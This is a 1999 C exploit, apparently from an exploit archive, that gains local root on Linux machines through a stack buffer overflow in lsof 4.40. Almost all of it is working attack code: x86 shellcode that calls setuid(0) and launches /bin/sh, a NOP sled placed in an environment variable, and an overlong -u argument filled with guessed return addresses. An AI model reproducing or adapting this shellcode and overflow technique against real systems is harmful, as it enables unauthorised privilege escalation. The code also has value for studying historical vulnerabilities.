lsof 4.40 exploit, local root compromise. 0.901 kb.
fd57d63feaa510208b2a6f6141f559fb4c170ddba15ac5de626e6a8d166543b5
/*
* ls0f.c (c) 1999 Subterrain Security
* Written by bind - 1999
*
* Vulnerable: linux machines running lsof 4.40
*
* Cheers to xdr & cripto...
*/
#include <stdio.h>
#include <strings.h>
#define LSOF "/usr/sbin/lsof"
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{ __asm__("movl %esp, %eax"); }
int main(int argc, char **argv)
{
char code[2000];
char ret[28];
int offset, i;
int len = strlen(shellcode);
if(argc > 1) offset = atoi(argv[1]);
for(i = 0;i <= 28;i += 4)
*(long *)&ret[i] = (unsigned long) get_sp() - offset;
memset(code, 0x90, 2000);
memcpy(code+(2000 - len), shellcode, len);
setenv("CODE", code, 1);
execl(LSOF,"lsof","-u",ret,NULL);
}